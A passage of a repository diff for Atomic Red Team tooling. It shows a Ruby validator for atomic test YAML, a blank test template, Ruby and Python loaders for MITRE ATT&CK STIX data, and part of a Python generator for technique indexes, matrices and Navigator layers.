raise('`display_name` element must be an array') unless yaml['display_name'].is_a?(String)
raise('`atomic_tests` element is required') unless yaml.has_key?('atomic_tests')
raise('`atomic_tests` element must be an array') unless yaml['atomic_tests'].is_a?(Array)
raise('`atomic_tests` element is empty - you have no tests') unless yaml['atomic_tests'].count > 0
yaml['atomic_tests'].each_with_index do |atomic, i|
raise("`atomic_tests[#{i}].name` element is required") unless atomic.has_key?('name')
raise("`atomic_tests[#{i}].name` element must be a string") unless atomic['name'].is_a?(String)
raise("`atomic_tests[#{i}].description` element is required") unless atomic.has_key?('description')
raise("`atomic_tests[#{i}].description` element must be a string") unless atomic['description'].is_a?(String)
raise("`atomic_tests[#{i}].supported_platforms` element is required") unless atomic.has_key?('supported_platforms')
raise("`atomic_tests[#{i}].supported_platforms` element must be an Array (was a #{atomic['supported_platforms'].class.name})") unless atomic['supported_platforms'].is_a?(Array)
valid_supported_platforms = ['windows', 'centos', 'ubuntu', 'macos', 'linux']
atomic['supported_platforms'].each do |platform|
if !valid_supported_platforms.include?(platform)
raise("`atomic_tests[#{i}].supported_platforms` '#{platform}' must be one of #{valid_supported_platforms.join(', ')}")
end
end
(atomic['input_arguments'] || {}).each_with_index do |arg_kvp, iai|
arg_name, arg = arg_kvp
raise("`atomic_tests[#{i}].input_arguments[#{iai}].description` element is required") unless arg.has_key?('description')
raise("`atomic_tests[#{i}].input_arguments[#{iai}].description` element must be a string") unless arg['description'].is_a?(String)
raise("`atomic_tests[#{i}].input_arguments[#{iai}].type` element is required") unless arg.has_key?('type')
raise("`atomic_tests[#{i}].input_arguments[#{iai}].type` element must be a string") unless arg['type'].is_a?(String)
raise("`atomic_tests[#{i}].input_arguments[#{iai}].type` element must be lowercased and underscored (was #{arg['type']})") unless arg['type'] =~ /[a-z_]+/
# TODO: determine if we think default values are required for EVERY input argument
# raise("`atomic_tests[#{i}].input_arguments[#{iai}].default` element is required") unless arg.has_key?('default')
# raise("`atomic_tests[#{i}].input_arguments[#{iai}].default` element must be a string (was a #{arg['default'].class.name})") unless arg['default'].is_a?(String)
end
raise("`atomic_tests[#{i}].executor` element is required") unless atomic.has_key?('executor')
executor = atomic['executor']
raise("`atomic_tests[#{i}].executor.name` element is required") unless executor.has_key?('name')
raise("`atomic_tests[#{i}].executor.name` element must be a string") unless executor['name'].is_a?(String)
raise("`atomic_tests[#{i}].executor.name` element must be lowercased and underscored (was #{executor['name']})") unless executor['name'] =~ /[a-z_]+/
valid_executor_types = ['command_prompt', 'sh', 'bash', 'powershell', 'manual']
case executor['name']
when 'manual'
raise("`atomic_tests[#{i}].executor.steps` element is required") unless executor.has_key?('steps')
raise("`atomic_tests[#{i}].executor.steps` element must be a string") unless executor['steps'].is_a?(String)
validate_input_args_vs_string! input_args: (atomic['input_arguments'] || {}).keys,
string: executor['steps'],
string_description: "atomic_tests[#{i}].executor.steps"
when 'command_prompt', 'sh', 'bash', 'powershell'
raise("`atomic_tests[#{i}].executor.command` element is required") unless executor.has_key?('command')
raise("`atomic_tests[#{i}].executor.command` element must be a string") unless executor['command'].is_a?(String)
validate_input_args_vs_string! input_args: (atomic['input_arguments'] || {}).keys,
string: executor['command'],
string_description: "atomic_tests[#{i}].executor.command"
else
raise("`atomic_tests[#{i}].executor.name` '#{executor['name']}' must be one of #{valid_executor_types.join(', ')}")
end
validate_no_todos!(atomic, path: "atomic_tests[#{i}]")
end
end
#
# Validates that the arguments (specified in "#{arg}" format) in a string
# match the input_arguments for a test
#
def validate_input_args_vs_string!(input_args:, string:, string_description:)
input_args_in_string = string.scan(/#\{([^}]+)\}/).to_a.flatten
input_args_in_string_and_not_specced = input_args_in_string - input_args
if input_args_in_string_and_not_specced.count > 0
raise("`#{string_description}` contains args #{input_args_in_string_and_not_specced} not in input_arguments")
end
input_args_in_spec_not_string = input_args - input_args_in_string
if input_args_in_string_and_not_specced.count > 0
raise("`atomic_tests[#{i}].input_arguments` contains args #{input_args_in_spec_not_string} not in command")
end
end
#
# Recursively validates that the hash (or something) doesn't contain a TODO
#
def validate_no_todos!(hashish, path:)
if hashish.is_a? String
raise "`#{path}` contains a TODO" if hashish.include? 'TODO'
elsif hashish.is_a? Array
hashish.each_with_index do |item, i|
validate_no_todos! item, path: "#{path}[#{i}]"
end
elsif hashish.is_a? Hash
hashish.each do |k, v|
validate_no_todos! v, path: "#{path}.#{k}"
end
end
end
end
atomic_red_team/atomic_test_template.yaml
+26
View File
@@ -0,0 +1,26 @@
---
attack_technique: TODO
display_name: TODO
atomic_tests:
- name: TODO
description: |
TODO
supported_platforms:
- windows
- macos
- centos
- ubuntu
- linux
input_arguments:
output_file:
description: TODO
type: todo
default: TODO
executor:
name: command_prompt
command: |
TODO
atomic_red_team/attack_api.py
-238
View File
@@ -1,238 +0,0 @@
"""
Attack API module for loading and querying MITRE ATT&CK technique data.
This module provides the Attack class that loads information about ATT&CK techniques
from MITRE's ATT&CK STIX representation using the mitreattack-python library.
"""
import json
import re
from pathlib import Path
from typing import Dict, List, Optional, Pattern
# Tactics in the order that the ATT&CK matrix uses
ORDERED_TACTICS = [
"initial-access",
"execution",
"persistence",
"privilege-escalation",
"defense-evasion",
"credential-access",
"discovery",
"lateral-movement",
"collection",
"exfiltration",
"command-and-control",
"impact",
]
class Attack:
"""
API class that loads information about ATT&CK techniques from MITRE's ATT&CK
STIX representation. Optimized for speed with caching.
"""
def __init__(self, stix_file: Optional[str] = None):
"""
Initialize the Attack API.
Args:
stix_file: Optional path to a local STIX JSON file.
Defaults to enterprise-attack.json in the same directory.
"""
if stix_file is None:
stix_file = str(Path(__file__).parent / "enterprise-attack.json")
self._stix_file = stix_file
self._techniques: Optional[List[dict]] = None
self._technique_by_id: Optional[Dict[str, dict]] = None
self._attack_stix: Optional[dict] = None
def _load_stix(self) -> dict:
"""Load and cache the STIX JSON data."""
if self._attack_stix is None:
with open(self._stix_file, "r", encoding="utf-8") as f:
self._attack_stix = json.load(f)
return self._attack_stix
@property
def ordered_tactics(self) -> List[str]:
"""Returns tactics in the order that the ATT&CK matrix uses."""
return ORDERED_TACTICS
def technique_identifier_for_technique(self, technique: dict) -> str:
"""
Returns the technique identifier (e.g., T1234) for a Technique object.
Args:
technique: A technique dictionary from the STIX data.
Returns:
The technique ID (e.g., "T1234" or "T1234.001").
"""
external_refs = technique.get("external_references", [])
for ref in external_refs:
if ref.get("source_name") == "mitre-attack":
return ref.get("external_id", "").upper()
return ""
def _build_technique_index(self) -> Dict[str, dict]:
"""Build an index of technique_id -> technique for fast lookups."""
if self._technique_by_id is None:
self._technique_by_id = {}
for technique in self.techniques:
tech_id = self.technique_identifier_for_technique(technique)
if tech_id:
self._technique_by_id[tech_id] = technique
return self._technique_by_id
def technique_info(self, technique_id: str) -> Optional[dict]:
"""
Returns a Technique object given a technique identifier (T1234).
Args:
technique_id: The technique ID (e.g., "T1234").
Returns:
The technique dictionary or None if not found.
"""
index = self._build_technique_index()
return index.get(technique_id.upper())
def ordered_tactic_to_technique_matrix(
self, only_platform: Pattern = re.compile(r".*")
) -> List[List[Optional[dict]]]:
"""
Returns the ATT&CK Matrix as a 2D array, in order by ordered_tactics.
Args:
only_platform: Regex pattern to filter techniques by platform.
Returns:
2D list of techniques organized by tactic columns.
"""
all_techniques = self.techniques_by_tactic(only_platform=only_platform)
# Make a 2D array of techniques in the order our tactics appear
all_techniques_in_tactic_order = []
for tactic in self.ordered_tactics:
all_techniques_in_tactic_order.append(all_techniques.get(tactic, []))
# Figure out the max number of techniques any one tactic has
max_techniques = (
max(len(techs) for techs in all_techniques_in_tactic_order)
if all_techniques_in_tactic_order
else 0
)
if max_techniques == 0:
return []
# Extend each array of techniques to that length
for techniques in all_techniques_in_tactic_order:
techniques.extend([None] * (max_techniques - len(techniques)))
# Transpose to give us the data in columnar format
return list(map(list, zip(*all_techniques_in_tactic_order)))
def techniques_by_tactic(
self, only_platform: Pattern = re.compile(r".*")
) -> Dict[str, List[dict]]:
"""
Returns a map of all [ATT&CK Tactic name] => [List of ATT&CK techniques].
Args:
only_platform: Regex pattern to filter techniques by platform.
Returns:
Dictionary mapping tactic names to lists of techniques.
"""
techniques_by_tactic: Dict[str, List[dict]] = {}
for technique in self.techniques:
platforms = technique.get("x_mitre_platforms")
if platforms is None:
continue
# Check if any platform matches
platform_match = any(
only_platform.match(p.lower().replace(" ", "-")) for p in platforms
)
if not platform_match:
continue
# Skip revoked or deprecated techniques
if technique.get("revoked", False):
continue
if technique.get("x_mitre_deprecated", False):
continue
# Add to each tactic this technique belongs to
kill_chain_phases = technique.get("kill_chain_phases", [])
for phase in kill_chain_phases:
if phase.get("kill_chain_name") == "mitre-attack":
tactic_name = phase.get("phase_name")
if tactic_name:
if tactic_name not in techniques_by_tactic:
techniques_by_tactic[tactic_name] = []
techniques_by_tactic[tactic_name].append(technique)
return techniques_by_tactic
@property
def techniques(self) -> List[dict]:
"""
Returns a list of all ATT&CK techniques.
Returns:
List of technique dictionaries.
"""
if self._techniques is not None:
return self._techniques
stix_data = self._load_stix()
self._techniques = []
for item in stix_data.get("objects", []):
if item.get("type") != "attack-pattern":
continue
# Check if it has mitre-attack external reference
external_refs = item.get("external_references", [])
has_mitre_ref = any(
ref.get("source_name") == "mitre-attack" for ref in external_refs
)
if has_mitre_ref:
self._techniques.append(item)
return self._techniques
def get_tactics(self) -> List[dict]:
"""
Returns a list of all ATT&CK tactics.
Returns:
List of tactic dictionaries.
"""
stix_data = self._load_stix()
tactics = []
for item in stix_data.get("objects", []):
if item.get("type") == "x-mitre-tactic":
tactics.append(item)
return tactics
# Singleton instance for convenience - lazy loaded
_attack_api: Optional[Attack] = None
def get_attack_api() -> Attack:
"""Get or create the singleton Attack API instance."""
global _attack_api
if _attack_api is None:
_attack_api = Attack()
return _attack_api
# For backwards compatibility
ATTACK_API = Attack()
atomic_red_team/attack_api.rb
Executable
+113
View File
@@ -0,0 +1,113 @@
require 'open-uri'
require 'json'
#
# Attack is an API class that loads information about ATT&CK techniques from MITRE'S ATT&CK
# STIX representation. It makes it very simple to do common things with ATT&CK.
#
class Attack
#
# Tactics as presented in the order that the ATT&CK matrics uses
#
def ordered_tactics
[
'initial-access',
'execution',
'persistence',
'privilege-escalation',
'defense-evasion',
'credential-access',
'discovery',
'lateral-movement',
'collection',
'exfiltration',
'command-and-control',
]
end
#
# Returns the technique identifier (T1234) for a Technique object
#
def technique_identifier_for_technique(technique)
technique.fetch('external_references', []).find do |refs|
refs['source_name'] == 'mitre-attack'
end['external_id'].upcase
end
#
# Returns a Technique object given a technique identifier (T1234)
#
def technique_info(technique_id)
techniques.find do |item|
item.fetch('external_references', []).find do |references|
references['external_id'] == technique_id.upcase
end
end
end
#
# Returns the ATT&CK Matrix as a 2D array, in order by `ordered_tactics`
#
def ordered_tactic_to_technique_matrix(only_platform: /.*/)
all_techniques = techniques_by_tactic(only_platform: only_platform)
# make an 2d array of our techniques in the order our tactics appear
all_techniques_in_tactic_order = []
ordered_tactics.each do |tactic|
all_techniques_in_tactic_order << all_techniques[tactic]
end
# figure out the max number of techniques any one tactic has
max_techniques = all_techniques_in_tactic_order.collect(&:count).max
# extend each array of techniques to that length
all_techniques_in_tactic_order.each {|techniques| techniques.concat(Array.new(max_techniques - techniques.count, nil))}
# transpose to give us the data in columnar format
all_techniques_in_tactic_order.transpose
end
#
# Returns a map of all [ ATT&CK Tactic name ] => [ List of ATT&CK techniques associated with that tactic]
#
def techniques_by_tactic(only_platform: /.*/)
techniques_by_tactic = Hash.new {|h, k| h[k] = []}
techniques.each do |technique|
next unless technique['x_mitre_platforms'].any? {|platform| platform.downcase =~ only_platform}
technique.fetch('kill_chain_phases', []).select {|phase| phase['kill_chain_name'] == 'mitre-attack'}.each do |tactic|
techniques_by_tactic[tactic.fetch('phase_name')] << technique
end
end
techniques_by_tactic
end
#
# Returns a list of all ATT&CK techniques
#
def techniques
# pull out the attack pattern objects
attack_stix.fetch("objects").select do |item|
item.fetch('type') == 'attack-pattern' && item.fetch('external_references', []).select do |references|
references['source_name'] == 'mitre-attack'
end
end
end
private
#
# Returns the complete ATT&CK STIX collection parsed into a Hash
#
def attack_stix
@attack_stix ||= begin
# load the full attack library
local_attack_json_to_try = "#{File.dirname(__FILE__)}/enterprise-attack.json"
if File.exists? local_attack_json_to_try
JSON.parse File.read(local_attack_json_to_try)
else
JSON.parse open('https://raw.githubusercontent.com/mitre/cti/master/enterprise-attack/enterprise-attack.json').read
end
end
end
end
atomic_red_team/common.py
-5
View File
@@ -1,5 +0,0 @@
from os.path import dirname, realpath
base_path = dirname(dirname(realpath(__file__)))
atomics_path = f"{base_path}/atomics"
used_guids_file = f"{atomics_path}/used_guids.txt"
atomic_red_team/doc_generator.py
-729
View File
@@ -1,729 +0,0 @@
"""
Atomic Red Team documentation generator.
This module generates all documentation including:
- Individual technique markdown files
- ATT&CK matrices (markdown)
- Platform-specific indexes (markdown, CSV, YAML)
- ATT&CK Navigator layers (JSON)
"""
import csv
import json
import re
from concurrent.futures import ProcessPoolExecutor, as_completed
from io import StringIO
from pathlib import Path
from typing import Dict, List, Optional, Pattern, Tuple
from atomic_red_team.attack_api import ATTACK_API
from atomic_red_team.utils import ATOMIC_RED_TEAM, AtomicRedTeam
import yaml
# Platform configurations for index generation
PLATFORM_CONFIGS = {
"all": {"pattern": re.compile(r".*"), "attack_pattern": re.compile(r".*")},
"windows": {
"pattern": re.compile(r"windows"),
"attack_pattern": re.compile(r"windows"),
},
"macos": {
"pattern": re.compile(r"macos"),
"attack_pattern": re.compile(r"windows"),
},
"linux": {
"pattern": re.compile(r"linux"),
"attack_pattern": re.compile(r"windows"),
},
"iaas": {"pattern": re.compile(r"iaas"), "attack_pattern": re.compile(r"windows")},
"containers": {
"pattern": re.compile(r"containers"),
"attack_pattern": re.compile(r"windows"),
},
"office-365": {
"pattern": re.compile(r"office-365"),
"attack_pattern": re.compile(r"office"),
},
"google-workspace": {
"pattern": re.compile(r"google-workspace"),
"attack_pattern": re.compile(r"office"),
},
"azure-ad": {
"pattern": re.compile(r"azure-ad"),
"attack_pattern": re.compile(r"identity"),
},
"esxi": {"pattern": re.compile(r"esxi"), "attack_pattern": re.compile(r"esxi")},
"iaas:gcp": {
"pattern": re.compile(r"iaas:gcp"),
"attack_pattern": re.compile(r".*"),
},
"iaas:azure": {
"pattern": re.compile(r"iaas:azure"),
"attack_pattern": re.compile(r".*"),
},
"iaas:aws": {
"pattern": re.compile(r"iaas:aws"),
"attack_pattern": re.compile(r".*"),
},
}
def _generate_technique_doc_worker(
args: Tuple[dict, str],
) -> Tuple[str, bool, Optional[str]]:
"""Standalone function for ProcessPoolExecutor to generate a single technique doc."""
atomic_yaml, atomics_directory = args
try:
art = AtomicRedTeam(atomics_directory=atomics_directory)
yaml_path = atomic_yaml["atomic_yaml_path"]
md_path = yaml_path.replace(".yaml", ".md")
technique_id = atomic_yaml.get("attack_technique", "").upper()
art.generate_technique_docs(technique_id, md_path)
return (yaml_path, True, None)
except Exception as ex:
return (atomic_yaml.get("atomic_yaml_path", "unknown"), False, str(ex))
def _generate_matrix_worker(args: Tuple[str, str, str, Optional[str]]) -> None:
"""Standalone function for ProcessPoolExecutor to generate a matrix."""
title_prefix, output_path, atomics_directory, platform_pattern = args
import importlib
from pathlib import Path
doc_generator = importlib.import_module('atomic_red_team.doc_generator')
utils = importlib.import_module('atomic_red_team.utils')
art = utils.AtomicRedTeam(atomics_directory=atomics_directory)
docs = doc_generator.AtomicRedTeamDocs(atomic_red_team=art)
pattern = re.compile(platform_pattern) if platform_pattern else re.compile(r".*")
docs.generate_attack_matrix(title_prefix, Path(output_path), only_platform=pattern)
def _generate_index_worker(
args: Tuple[str, str, str, Optional[str], Optional[str]],
) -> None:
"""Standalone function for ProcessPoolExecutor to generate a markdown index."""
(
title_prefix,
output_path,
atomics_directory,
only_platform_pattern,
attack_platform_pattern,
) = args
import importlib
from pathlib import Path
doc_generator = importlib.import_module('atomic_red_team.doc_generator')
utils = importlib.import_module('atomic_red_team.utils')
art = utils.AtomicRedTeam(atomics_directory=atomics_directory)
docs = doc_generator.AtomicRedTeamDocs(atomic_red_team=art)
only_platform = (
re.compile(only_platform_pattern)
if only_platform_pattern
else re.compile(r".*")
)
attack_platform = (
re.compile(attack_platform_pattern)
if attack_platform_pattern
else re.compile(r".*")
)
docs.generate_index(
title_prefix,
Path(output_path),
only_platform=only_platform,
attack_platform=attack_platform,
)
def _generate_index_csv_worker(
args: Tuple[str, str, Optional[str], Optional[str]],
) -> None:
"""Standalone function for ProcessPoolExecutor to generate a CSV index."""
output_path, atomics_directory, only_platform_pattern, attack_platform_pattern = (
args
)
import importlib
from pathlib import Path
doc_generator = importlib.import_module('atomic_red_team.doc_generator')
utils = importlib.import_module('atomic_red_team.utils')
art = utils.AtomicRedTeam(atomics_directory=atomics_directory)
docs = doc_generator.AtomicRedTeamDocs(atomic_red_team=art)
only_platform = (
re.compile(only_platform_pattern)
if only_platform_pattern
else re.compile(r".*")
)
attack_platform = (
re.compile(attack_platform_pattern)
if attack_platform_pattern
else re.compile(r".*")
)
docs.generate_index_csv(
Path(output_path), only_platform=only_platform, attack_platform=attack_platform
)
def _generate_yaml_index_worker(args: Tuple[str, str]) -> None:
"""Standalone function for ProcessPoolExecutor to generate a YAML index."""
output_path, atomics_directory = args
import importlib
from pathlib import Path
doc_generator = importlib.import_module('atomic_red_team.doc_generator')
utils = importlib.import_module('atomic_red_team.utils')
art = utils.AtomicRedTeam(atomics_directory=atomics_directory)
docs = doc_generator.AtomicRedTeamDocs(atomic_red_team=art)
docs.generate_yaml_index(Path(output_path))
def _generate_yaml_index_by_platform_worker(args: Tuple[str, str, str]) -> None:
"""Standalone function for ProcessPoolExecutor to generate a platform-specific YAML index."""
output_path, atomics_directory, platform = args
import importlib
from pathlib import Path
doc_generator = importlib.import_module('atomic_red_team.doc_generator')
utils = importlib.import_module('atomic_red_team.utils')
art = utils.AtomicRedTeam(atomics_directory=atomics_directory)
docs = doc_generator.AtomicRedTeamDocs(atomic_red_team=art)
docs.generate_yaml_index_by_platform(Path(output_path), platform)
class AtomicRedTeamDocs:
"""
Documentation generator for Atomic Red Team.
Generates all documentation including technique docs, indexes, matrices,
and ATT&CK Navigator layers.
"""
def __init__(self, atomic_red_team: Optional[AtomicRedTeam] = None):
"""Initialize the documentation generator."""
self.atomic_red_team = atomic_red_team or ATOMIC_RED_TEAM
self.atomics_directory = self.atomic_red_team.atomics_directory
def generate_all_the_docs(self) -> Tuple[List[str], List[str]]:
"""
Generate all documentation used by Atomic Red Team.
Returns:
Tuple of (successful_paths, failed_paths)
"""
oks = []
fails = []
# Generate individual technique docs concurrently
with ProcessPoolExecutor() as executor:
future_to_yaml = {
executor.submit(
_generate_technique_doc_worker,
(atomic_yaml, self.atomics_directory),
): atomic_yaml
for atomic_yaml in self.atomic_red_team.atomic_tests
}
for future in as_completed(future_to_yaml):
yaml_path, success, error = future.result()
if success:
oks.append(yaml_path)
else:
fails.append(yaml_path)
print(f"{yaml_path}: {error}")
print(f"\nGenerated docs for {len(oks)} techniques, {len(fails)} failures")
# Prepare directories
indexes_dir = Path(self.atomics_directory) / "Indexes"
matrices_dir = indexes_dir / "Matrices"
md_indexes_dir = indexes_dir / "Indexes-Markdown"
csv_indexes_dir = indexes_dir / "Indexes-CSV"
layers_dir = indexes_dir / "Attack-Navigator-Layers"
for dir_path in [matrices_dir, md_indexes_dir, csv_indexes_dir, layers_dir]:
dir_path.mkdir(parents=True, exist_ok=True)
print("\nGenerating indexes and matrices concurrently...")
# Prepare all index generation tasks
tasks = []
# ATT&CK matrices
tasks.append(("matrix", _generate_matrix_worker, ("All", str(matrices_dir / "matrix.md"), self.atomics_directory, None)))
tasks.append(("windows-matrix", _generate_matrix_worker, ("Windows", str(matrices_dir / "windows-matrix.md"), self.atomics_directory, r"windows")))
tasks.append(("macos-matrix", _generate_matrix_worker, ("macOS", str(matrices_dir / "macos-matrix.md"), self.atomics_directory, r"macos")))
tasks.append(("linux-matrix", _generate_matrix_worker, ("Linux", str(matrices_dir / "linux-matrix.md"), self.atomics_directory, r"linux")))
tasks.append(("esxi-matrix", _generate_matrix_worker, ("ESXi", str(matrices_dir / "esxi-matrix.md"), self.atomics_directory, r"esxi")))
# Markdown indexes
tasks.append(("md-index-all", _generate_index_worker, ("All", str(md_indexes_dir / "index.md"), self.atomics_directory, None, None)))
tasks.append(("md-index-windows", _generate_index_worker, ("Windows", str(md_indexes_dir / "windows-index.md"), self.atomics_directory, r"windows", r"windows")))
tasks.append(("md-index-macos", _generate_index_worker, ("macOS", str(md_indexes_dir / "macos-index.md"), self.atomics_directory, r"macos", r"windows")))
tasks.append(("md-index-linux", _generate_index_worker, ("Linux", str(md_indexes_dir / "linux-index.md"), self.atomics_directory, r"linux", r"windows")))
tasks.append(("md-index-iaas", _generate_index_worker, ("IaaS", str(md_indexes_dir / "iaas-index.md"), self.atomics_directory, r"iaas", r"windows")))
tasks.append(("md-index-containers", _generate_index_worker, ("Containers", str(md_indexes_dir / "containers-index.md"), self.atomics_directory, r"containers", r"windows")))
tasks.append(("md-index-office365", _generate_index_worker, ("Office 365", str(md_indexes_dir / "office-365-index.md"), self.atomics_directory, r"office-365", r"office")))
tasks.append(("md-index-google-workspace", _generate_index_worker, ("Google Workspace", str(md_indexes_dir / "google-workspace-index.md"), self.atomics_directory, r"google-workspace", r"office")))
tasks.append(("md-index-azure-ad", _generate_index_worker, ("Azure AD", str(md_indexes_dir / "azure-ad-index.md"), self.atomics_directory, r"azure-ad", r"identity")))
tasks.append(("md-index-esxi", _generate_index_worker, ("ESXi", str(md_indexes_dir / "esxi-index.md"), self.atomics_directory, r"esxi", r"esxi")))
# CSV indexes
tasks.append(("csv-index-all", _generate_index_csv_worker, (str(csv_indexes_dir / "index.csv"), self.atomics_directory, None, None)))
tasks.append(("csv-index-windows", _generate_index_csv_worker, (str(csv_indexes_dir / "windows-index.csv"), self.atomics_directory, r"windows", r"windows")))
tasks.append(("csv-index-macos", _generate_index_csv_worker, (str(csv_indexes_dir / "macos-index.csv"), self.atomics_directory, r"macos", r"macos")))
tasks.append(("csv-index-linux", _generate_index_csv_worker, (str(csv_indexes_dir / "linux-index.csv"), self.atomics_directory, r"linux", r"linux")))
tasks.append(("csv-index-iaas", _generate_index_csv_worker, (str(csv_indexes_dir / "iaas-index.csv"), self.atomics_directory, r"iaas", r"iaas")))
tasks.append(("csv-index-containers", _generate_index_csv_worker, (str(csv_indexes_dir / "containers-index.csv"), self.atomics_directory, r"containers", r"containers")))
tasks.append(("csv-index-office365", _generate_index_csv_worker, (str(csv_indexes_dir / "office-365-index.csv"), self.atomics_directory, r"office-365", r"office")))
tasks.append(("csv-index-google-workspace", _generate_index_csv_worker, (str(csv_indexes_dir / "google-workspace-index.csv"), self.atomics_directory, r"google-workspace", r"identity")))
tasks.append(("csv-index-azure-ad", _generate_index_csv_worker, (str(csv_indexes_dir / "azure-ad-index.csv"), self.atomics_directory, r"azure-ad", r"identity")))
tasks.append(("csv-index-esxi", _generate_index_csv_worker, (str(csv_indexes_dir / "esxi-index.csv"), self.atomics_directory, r"esxi", r"esxi")))
# YAML indexes
tasks.append(("yaml-index-all", _generate_yaml_index_worker, (str(indexes_dir / "index.yaml"), self.atomics_directory)))
for platform in ["windows", "macos", "linux", "office-365", "azure-ad", "google-workspace", "iaas", "containers", "iaas:gcp", "iaas:azure", "iaas:aws", "esxi"]:
filename = f"{platform.replace(':', '_')}-index.yaml"
tasks.append((f"yaml-index-{platform}", _generate_yaml_index_by_platform_worker, (str(indexes_dir / filename), self.atomics_directory, platform)))
# Generate all indexes concurrently
with ProcessPoolExecutor() as executor:
future_to_task = {executor.submit(task[1], task[2]): task[0] for task in tasks}
for future in as_completed(future_to_task):
task_name = future_to_task[future]
try:
future.result()
except Exception as ex:
print(f"✗ Error generating {task_name}: {ex}")
# Generate ATT&CK Navigator layers (this is already optimized internally)
print("\nGenerating ATT&CK Navigator layers...")
self.generate_navigator_layers(layers_dir)
return oks, fails
def generate_attack_matrix(
self,
title_prefix: str,
output_path: Path,
only_platform: Pattern = re.compile(r".*"),
) -> None:
"""Generate a Markdown ATT&CK matrix."""
result = f"# {title_prefix} Atomic Tests by ATT&CK Tactic & Technique\n"
result += f"| {' | '.join(ATTACK_API.ordered_tactics)} |\n"
result += f"|{'-----|' * len(ATTACK_API.ordered_tactics)}\n"
matrix = ATTACK_API.ordered_tactic_to_technique_matrix(
only_platform=only_platform
)
for row in matrix:
row_values = []
for technique in row:
if technique:
row_values.append(
self.atomic_red_team.github_link_to_technique(
technique,
include_identifier=False,
only_platform=only_platform,
)
)
else:
row_values.append("")
result += f"| {' | '.join(row_values)} |\n"
output_path.write_text(result, encoding="utf-8")
print(f"Generated ATT&CK matrix at {output_path}")
def generate_index(
self,
title_prefix: str,
output_path: Path,
only_platform: Pattern = re.compile(r".*"),
attack_platform: Pattern = re.compile(r".*"),
) -> None:
"""Generate a Markdown index of ATT&CK Tactic -> Technique -> Atomic Tests."""
result = f"# {title_prefix} Atomic Tests by ATT&CK Tactic & Technique\n"
techniques_by_tactic = ATTACK_API.techniques_by_tactic(
only_platform=attack_platform
)
for tactic, techniques in techniques_by_tactic.items():
result += f"# {tactic}\n"
for technique in techniques:
result += f"- {self.atomic_red_team.github_link_to_technique(technique, include_identifier=True, only_platform=only_platform)}\n"
atomic_tests = self.atomic_red_team.atomic_tests_for_technique(
technique
)
for i, atomic_test in enumerate(atomic_tests):
platforms = atomic_test.get("supported_platforms", [])
if any(only_platform.match(p.lower()) for p in platforms):
result += f" - Atomic Test #{i + 1}: {atomic_test['name']} [{', '.join(platforms)}]\n"
result += "\n"
output_path.write_text(result, encoding="utf-8")
print(f"Generated Atomic Red Team index at {output_path}")
def generate_index_csv(
self,
output_path: Path,
only_platform: Pattern = re.compile(r".*"),
attack_platform: Pattern = re.compile(r".*"),
) -> None:
"""Generate a CSV index."""
output = StringIO(newline="")
writer = csv.writer(output, lineterminator="\n")
writer.writerow(
[
"Tactic",
"Technique #",
"Technique Name",
"Test #",
"Test Name",
"Test GUID",
"Executor Name",
]
)
techniques_by_tactic = ATTACK_API.techniques_by_tactic(
only_platform=attack_platform
)
for tactic, techniques in techniques_by_tactic.items():
for technique in techniques:
tech_id = ATTACK_API.technique_identifier_for_technique(technique)
# Get atomic YAML to use display_name (which has full technique name for sub-techniques)
atomic_yaml = self.atomic_red_team._get_atomic_by_id(tech_id)
if not atomic_yaml:
continue
tech_name = atomic_yaml.get("display_name", technique.get("name", ""))
atomic_tests = self.atomic_red_team.atomic_tests_for_technique(
technique
)
for i, atomic_test in enumerate(atomic_tests):
platforms = atomic_test.get("supported_platforms", [])
if any(only_platform.match(p.lower()) for p in platforms):
writer.writerow(
[
tactic,
tech_id,
tech_name,
i + 1,
atomic_test.get("name", ""),
atomic_test.get("auto_generated_guid", ""),
atomic_test.get("executor", {}).get("name", ""),
]
)
output_path.write_text(output.getvalue(), encoding="utf-8")
print(f"Generated Atomic Red Team CSV index at {output_path}")
def generate_yaml_index(self, output_path: Path) -> None:
"""Generate a master YAML index."""
result: Dict[str, dict] = {}
techniques_by_tactic = ATTACK_API.techniques_by_tactic()
for tactic, techniques in techniques_by_tactic.items():
result[tactic] = {}
for technique in techniques:
tech_id = ATTACK_API.technique_identifier_for_technique(technique)
# Create a copy of the technique and update name with display_name from YAML
technique_copy = json.loads(json.dumps(technique)) # Deep copy
atomic_yaml = self.atomic_red_team._get_atomic_by_id(tech_id)
if atomic_yaml and atomic_yaml.get("display_name"):
technique_copy["name"] = atomic_yaml["display_name"]
result[tactic][tech_id] = {
"technique": technique_copy,
"atomic_tests": self.atomic_red_team.atomic_tests_for_technique(
technique
),
}
# Convert through JSON to eliminate YAML aliases (matching Ruby behavior)
# Use explicit_start=True to add '---' at the beginning like Ruby
yaml_content = yaml.dump(
json.loads(json.dumps(result)),
default_flow_style=False,
allow_unicode=True,
sort_keys=False,
explicit_start=True,
)
output_path.write_text(yaml_content, encoding="utf-8")
print(f"Generated Atomic Red Team YAML index at {output_path}")
def generate_yaml_index_by_platform(self, output_path: Path, platform: str) -> None:
"""Generate a platform-specific YAML index."""
result: Dict[str, dict] = {}
techniques_by_tactic = ATTACK_API.techniques_by_tactic()
for tactic, techniques in techniques_by_tactic.items():
result[tactic] = {}
for technique in techniques:
tech_id = ATTACK_API.technique_identifier_for_technique(technique)
# Create a copy of the technique and update name with display_name from YAML
technique_copy = json.loads(json.dumps(technique)) # Deep copy
atomic_yaml = self.atomic_red_team._get_atomic_by_id(tech_id)
if atomic_yaml and atomic_yaml.get("display_name"):
technique_copy["name"] = atomic_yaml["display_name"]
result[tactic][tech_id] = {
"technique": technique_copy,
"atomic_tests": self.atomic_red_team.atomic_tests_for_technique_by_platform(
technique, platform
),
}
yaml_content = yaml.dump(
json.loads(json.dumps(result)),
default_flow_style=False,
allow_unicode=True,
sort_keys=False,
explicit_start=True,
)
output_path.write_text(yaml_content, encoding="utf-8")
print(f"Generated Atomic Red Team YAML index at {output_path}")
def _get_layer(self, techniques: List[dict], layer_name: str) -> dict:
"""Create an ATT&CK Navigator layer structure."""
filters = {}
if "Windows" in layer_name:
filters = {"platforms": ["Windows"]}
elif "macOS" in layer_name:
filters = {"platforms": ["macOS"]}
elif "Linux" in layer_name:
filters = {"platforms": ["Linux"]}
return {
"name": layer_name,
"versions": {"attack": "16", "navigator": "5.1.0", "layer": "4.5"},
"description": f"{layer_name} MITRE ATT&CK Navigator Layer",
"domain": "enterprise-attack",
"filters": filters,
"gradient": {
"colors": ["#ffffff", "#ce232e"],
"minValue": 0,
"maxValue": 10,
},
"legendItems": [
{"label": "10 or more tests", "color": "#ce232e"},
